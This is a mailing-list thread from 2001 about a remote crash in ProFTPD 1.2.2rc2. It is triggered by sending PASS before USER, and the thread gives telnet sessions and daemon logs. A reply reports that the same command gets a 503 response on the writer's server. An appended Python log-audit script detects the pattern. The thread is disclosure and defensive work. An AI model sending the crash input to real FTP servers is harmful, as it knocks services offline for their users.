Vulnerability Development mailing list archives
Re: ProFTPD 1.2.2rc2 DoS
From: Kurth Bemis <kurth () usaexpress net>
Date: Mon, 4 Jun 2001 09:19:31 -0400 (EDT)
Hrm. I run the same version here...look:

-------------
kurth@trinity:~$ telnet localhost 21
Trying 127.0.0.1...
Connected to trinity.
Escape character is '^]'.
220 ProFTPD 1.2.2rc2 Server (XXXXXXXX.XXXXXXXX.XXX ftp server) [trinity]
pass
503 Login with USER first.
-------------

and in the logs:

-------------
Jun 4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - connected - local : 127.0.0.1:21
Jun 4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - connected - remote : 127.0.0.1:4055
Jun 4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - FTP session opened.
Jun 4 09:11:59 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden)
Jun 4 09:12:04 trinity last message repeated 3 times
Jun 4 09:12:07 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: USER
Jun 4 09:12:07 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: USER
Jun 4 09:12:09 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden)
Jun 4 09:12:09 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden)
Jun 4 09:12:10 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - FTP session closed.
----------------

On Debian you need to configure with a special flag to make proftpd use the old md5 auth or something or other. It's too early in the morning to really think. :-) If it comes to me later in the day I'll post it if nobody else does.

I think that this problem is unique to your install.

~kurth

Kurth Bemis
Senior Network Admin/Owner: USAExpress.net
Owner: Ozone Computer
http://kurth.hardcrypto.com
PGP Key Avail.
---------------------------------------------------------------------
Uh!.....Uh!.....Uh!....."I'm done with this."...Out the window

On Sun, 3 Jun 2001, Daniel wrote:
I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the daemon can be crashed remotely:

This happens when the PASS command is received before the USER command:

box:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com]
pass
Connection closed by foreign host.
box:~#

If you run proftpd -d 5, (debug mode, level 5) in the logs you see:

box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)

- Daniel Volozov
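Added example, not part of either post and not ProFTPD project code: a log check for the condition this thread describes, flagging sessions where PASS arrives before any USER and daemon instances that terminate on signal 11. The function name `audit`, the session-key scheme, and the abridged sample lines are assumptions made for illustration; the line format follows the two log excerpts in the thread.

```python
import re

# Optional syslog prefix ("Jun  4 09:11:59 host proftpd[31773]: "), then the
# "server (client[ip]) - message" body that both excerpts in the thread share.
LINE = re.compile(
    r"^(?:\w{3}\s+\d+\s[\d:]{8}\s\S+\sproftpd\[(?P<pid>\d+)\]:\s)?"
    r"(?P<server>\S+) \((?P<client>[^)]*)\) - (?P<msg>.*)$"
)

# Sample input abridged from the two log excerpts in the thread.
SAMPLE = """\
Jun  4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - FTP session opened.
Jun  4 09:11:59 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden)
Jun  4 09:12:07 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: USER
Jun  4 09:12:09 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden)
Jun  4 09:12:10 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - FTP session closed.
box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)
""".splitlines()

def audit(lines):
    """Return (session_key, finding) pairs: PASS seen before USER in a
    session, and daemon instances that terminated on signal 11."""
    seen_user = {}   # session key -> True once USER has been received
    findings = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # unrelated lines, e.g. "last message repeated N times"
        # Key by PID when syslog supplies it, else by server/client (assumption).
        key = m["pid"] or f'{m["server"]}/{m["client"]}'
        msg = m["msg"]
        if msg.startswith("FTP session opened"):
            seen_user[key] = False
        elif msg.startswith("received: USER"):
            seen_user[key] = True
        elif msg.startswith("received: PASS"):
            if not seen_user.get(key, False):
                findings.append((key, "PASS before USER"))
        elif "terminating (signal 11)" in msg:
            findings.append((key, "crashed (signal 11)"))
        elif msg.startswith("FTP session closed"):
            seen_user.pop(key, None)
    return findings

if __name__ == "__main__":
    for key, finding in audit(SAMPLE):
        print(f"{key}: {finding}")
```

A "PASS before USER" finding followed by "crashed (signal 11)" on the same key matches the behaviour in the original report; the first finding alone matches the 503 response in the reply.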